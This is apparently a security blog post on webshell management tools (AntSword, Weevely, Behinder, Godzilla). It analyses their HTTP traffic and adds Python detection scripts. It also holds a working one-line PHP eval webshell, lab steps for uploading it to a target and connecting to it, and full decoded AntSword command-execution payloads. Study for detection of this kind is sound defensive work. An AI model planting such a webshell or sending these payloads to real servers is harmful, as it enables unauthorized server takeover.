Webshell Management Tools

Introduction to Webshells

  • A webshell is a code-execution environment that exists as a web page file (ASP, PHP, JSP, CGI and so on), used mainly for site management, server management and permission management.
  • Webshells are simple to use: upload a single code file and open it through a URL, and you can carry out many day-to-day operations, which makes managing a site and server far more convenient.
  • For exactly that reason, a minority of people modify such code and use it as a backdoor in order to take control of the web server.

What Webshells Are Used For

  • On the one hand, webmasters often use webshells for site and server management: editing web scripts online, uploading and downloading files, viewing databases, executing arbitrary commands, and so on.
  • On the other hand, intruders also commonly use webshells to take control of web servers. These web scripts are usually called web script trojans; ASP and PHP trojans are the most common, with .NET and JSP script trojans also in use. Webshells commonly seen in China include the Haiyang ASP trojan (海阳顶端), Phpspy and c99shell.

Webshell Management Tools

  • A webshell management tool is a tool for managing webshells. Its role is similar to a trojan's controller program: it bundles many small utilities that make managing webshells convenient for the attacker.
  • Common webshell management tools include AntSword (蚁剑), Behinder (冰蝎) and Weevely.

AntSword (中国蚁剑)

AntSword is an open-source, cross-platform website management tool aimed at authorized penetration testers and at webmasters carrying out routine operations. It is an excellent webshell management tool.

AntSword Core Features

  • Shell proxy
  • Shell management
  • File management
  • Virtual terminal
  • Database management
  • Plugin market
  • Plugin development

Basic Use of AntSword

Environment

  • Windows attacker machine with AntSword installed
  • Windows target machine with a phpStudy environment

Step 1: write a simple one-line webshell

<?php @eval($_POST['123456']); ?>

For more on one-line webshells, see my earlier post on CSDN: 使用PHP制作简单的一句话木马与PHP中文乱码问题 (building a simple one-line PHP webshell, and PHP Chinese garbling issues).

Step 2: upload the one-line webshell to the target server's web root

Step 3: open AntSword and right-click to add an entry

Step 4: fill in the connection details and test the connection

Step 5: double-click the added entry to see all of the target's drive letters.

Right-click to open a virtual terminal.

Decrypting and Analyzing AntSword Traffic

Capture the AntSword packets with Wireshark

Follow the HTTP stream to start the traffic analysis

No encoder

POST /shell.php HTTP/1.1

Host: 192.168.4.229

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 988

Connection: close

123=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22546a1e%22%3Becho%20%40asenc(%24output)%3Becho%20%226786a4e%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

HTTP/1.1 200 OK

Date: Fri, 14 Jan 2022 07:18:25 GMT

Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02

X-Powered-By: PHP/7.3.4

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8

546a1eD:/phpstudy_pro/WWW C:D: Windows NT DESKTOP-HF3Q4QD 10.0 build 19043 (Windows 10) AMD64 DELL6786a4e

After URL decoding:

<?php
123=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();
ob_end_clean();echo "546a1e";
echo @asenc($output);
echo "6786a4e";
}ob_start();
try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}	";
if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
}else{$R.="/";}$R.="	";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();$R.="	{$s}";
echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};
asoutput();die();

The Base64 encoder can also be used to encode and decode the traffic.

POST /shell.php HTTP/1.1

Host: 192.168.4.229

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 1036

Connection: close

123=%40eval(%40base64_decode(%24_POST%5Bqdf3b71771ac14%5D))%3B&qdf3b71771ac14=…%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&yedcd1567e1081=RDovcGhwc3R1ZHlfcHJvL1dXVy8%3D

HTTP/1.1 200 OK

After URL decoding:

123=@eval(@base64_decode($_POST[qdf3b71771ac14]));&qdf3b71771ac14=…&yedcd1567e1081=RDovcGhwc3R1ZHlfcHJvL1dXVy8=

Decrypting the Base64 traffic

After Base64 decoding:
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{return @base64_encode($out);};
function asoutput()
{$output=ob_get_contents();
ob_end_clean();
echo "ad2b56f";
echo @asenc($output);
echo "f5752aa7b";
}ob_start();
try{$D=base64_decode($_POST["yedcd1567e1081"]);    // the base64-encoded path
$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");   // open the path; report an error if it does not exist

Traffic characteristics when running ipconfig

Run the ipconfig command in the virtual terminal

POST /1.php HTTP/1.1
Host: 192.168.147.132
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4029
Connection: close

123456=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%222128a7e59%22%3Becho%20%40asenc(%24output)%3Becho%20%2294639%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%22ff7659052dae3%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%22if34e82746af23%22%5D)%3B%24envstr%3D%40base64_decode(%24_POST%5B%22rd6ea77c0d0469%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&ff7659052dae3=Y21k&if34e82746af23=Y2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXVyImaXBjb25maWcmZWNobyBbU10mY2QmZWNobyBbRV0%3D&rd6ea77c0d0469=

HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 16:14:57 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Feature 1:

User-Agent: antSword/v2.1

Feature 2:

@ini_set("display_errors", "0");   Other tools encrypt this; AntSword sends it in plaintext.

Feature 3:

Output-buffer functions appear in the payload (ob_start, ob_get_contents, ob_end_clean).

Feature 4:

In the Base64 variant, the last field decodes to the current directory.
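As an added example (not code from this post or from AntSword), the following Python checks a captured request for the four indicators above; it goes one step further by also base64-decoding every form field, so the Base64-encoder variant is matched as well as the plain one. The sample requests are constructed and shortened, with field names mirroring the captures.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote_plus, unquote_plus

# Constructed requests modelled on the captures above (not the original packets); PHP is a shortened stand-in.
PHP = ('@ini_set("display_errors", "0");@set_time_limit(0);function asoutput(){'
       '$output=ob_get_contents();ob_end_clean();echo $output;}ob_start();'
       'echo php_uname();asoutput();die();')
HEAD = ("POST /shell.php HTTP/1.1\r\nHost: 192.168.4.229\r\nUser-Agent: {ua}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
ANTSWORD_PLAIN = HEAD.format(ua="antSword/v2.1") + "123=" + quote_plus(PHP)
ANTSWORD_B64 = (HEAD.format(ua="antSword/v2.1")
                + "123=" + quote_plus("@eval(@base64_decode($_POST[qdf3b71771ac14]));")
                + "&qdf3b71771ac14=" + quote_plus(base64.b64encode(PHP.encode()).decode())
                + "&yedcd1567e1081=" + quote_plus(base64.b64encode(b"D:/phpstudy_pro/WWW/").decode()))
BENIGN = (HEAD.format(ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0")
          + "user=alice&pass=s3cret")

BUFFER_FUNCS = ("ob_start(", "ob_get_contents(", "ob_end_clean(")
PATH_RE = re.compile(r"([A-Za-z]:[\\/]|/)[\x20-\x7e]*")   # Windows drive root or POSIX root

def b64_text(value):
    # Decoded text if value is clean base64 of UTF-8 text, else None.
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def antsword_indicators(raw):
    # Names of the four indicators listed above that fire on one raw HTTP request.
    head, _, body = raw.partition("\r\n\r\n")
    headers = dict((k.strip().lower(), v.strip()) for k, _, v in
                   (line.partition(":") for line in head.split("\r\n")[1:]))
    fields = parse_qs(body, keep_blank_values=True)
    # Inspect the URL-decoded body plus every field that base64-decodes cleanly (Base64 encoder variant).
    views = [unquote_plus(body)] + [t for vs in fields.values() for v in vs
                                   if (t := b64_text(v)) is not None]
    hits = []
    if headers.get("user-agent", "").startswith("antSword/"):
        hits.append("user_agent")
    if any('@ini_set("display_errors", "0")' in v for v in views):
        hits.append("ini_set_plaintext")
    if any(all(f in v for f in BUFFER_FUNCS) for v in views):
        hits.append("output_buffer_funcs")
    last = list(fields.values())[-1][0] if fields else ""
    if (t := b64_text(last)) is not None and PATH_RE.fullmatch(t):
        hits.append("last_field_b64_path")
    return hits
```

The User-Agent alone is trivial for an operator to change, so the body-level indicators are the ones worth alerting on.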

Introduction to Weevely

  • Weevely is a webshell management tool written in Python. Its biggest advantage is that it is cross-platform; it can be regarded as a Linux substitute for Chopper (菜刀), limited to PHP.
  • Kali Linux ships with Weevely.

Basic Weevely commands: generating the agent

weevely generate <password> <path>

Basic Weevely commands: connecting to the agent or running a command

weevely <url> <password> [cmd]

Calling Weevely modules

Once the connection succeeds you get a shell. Besides running basic system commands, typing help lists the Weevely modules that can be called:

file_ls: list files and directories

file_download: download a file from a remote directory to the local machine

Weevely Traffic Analysis

Taking system_info as an example

Behinder and Godzilla are used in much the same way, so we go straight to the traffic analysis.

Behinder 3.0 Traffic Analysis

Behinder traffic capture (custom default password)

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 6252

HTTP/1.1 200 OK
Date: Sat, 15 Jan 2022 02:22:29 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=kv8hmj5ack6dv9uiobhoaff176; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 4716
Cookie: PHPSESSID=kv8hmj5ack6dv9uiobhoaff176;PHPSESSID=kv8hmj5ack6dv9uiobhoaff176

1. User-Agent

User-Agent comparison: Firefox versus Behinder traffic

Firefox's User-Agent

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0

Behinder traffic's User-Agent

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36

Comparison of normal traffic and Behinder traffic

Normal traffic

GET /shell.php HTTP/1.1
Host: 192.168.4.229
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=kof14ks054u9oo46uacv6vjgvk
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Behinder traffic

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 6252

Traffic feature: encryption

Behinder's encryption method is dynamic binary encryption (AES).

Another feature: there is no plaintext exchange at all; the key format is md5("admin")[0:16].

The key is derived with MD5.

Godzilla traffic

Traffic features: password, eval, pass
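An added example (not from this post or from Behinder): deriving the key as stated above, and checking a request for the fixed Chrome User-Agent and for a POST body that is one opaque base64 token with no plaintext. The requests are constructed; the body is a stand-in base64 string, not real ciphertext.

```python
import hashlib
import re

# Constructed requests modelled on the captures above (not the original packets).
# The POST body is a stand-in of opaque base64 text, not a real encrypted payload.
BEHINDER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36")
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0"
BEHINDER_REQ = ("POST /shell.php HTTP/1.1\r\nHost: 192.168.4.229\r\n"
                f"User-Agent: {BEHINDER_UA}\r\n"
                "Content-type: application/x-www-form-urlencoded\r\n\r\n" + "Zm9vYmFy" * 12)
NORMAL_GET = ("GET /shell.php HTTP/1.1\r\nHost: 192.168.4.229\r\n"
              f"User-Agent: {FIREFOX_UA}\r\nAccept: text/html\r\n\r\n")
NORMAL_POST = ("POST /login.php HTTP/1.1\r\nHost: 192.168.4.229\r\n"
               f"User-Agent: {FIREFOX_UA}\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n\r\nuser=alice&pass=s3cret")

# One base64 token and nothing else: no key=value form structure, no PHP in the clear.
OPAQUE_BODY = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def behinder_key(password):
    # AES key as described above: the first 16 hex characters of md5(password).
    return hashlib.md5(password.encode()).hexdigest()[:16]

def behinder_indicators(raw):
    # Names of the Behinder indicators from the analysis above that fire on one request.
    head, _, body = raw.partition("\r\n\r\n")
    ua = next((line.split(":", 1)[1].strip() for line in head.split("\r\n")
               if line.lower().startswith("user-agent:")), "")
    hits = []
    if ua == BEHINDER_UA:                       # fixed Chrome 84 UA whatever the real client is
        hits.append("fixed_chrome84_ua")
    if head.startswith("POST ") and OPAQUE_BODY.fullmatch(body):
        hits.append("opaque_base64_post_body")  # no plaintext exchange at all
    return hits
```

The key is only useful to a responder who already holds the shell's password (for example from the recovered shell file); without it the body stays opaque, which is exactly why the header and body-shape indicators matter.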
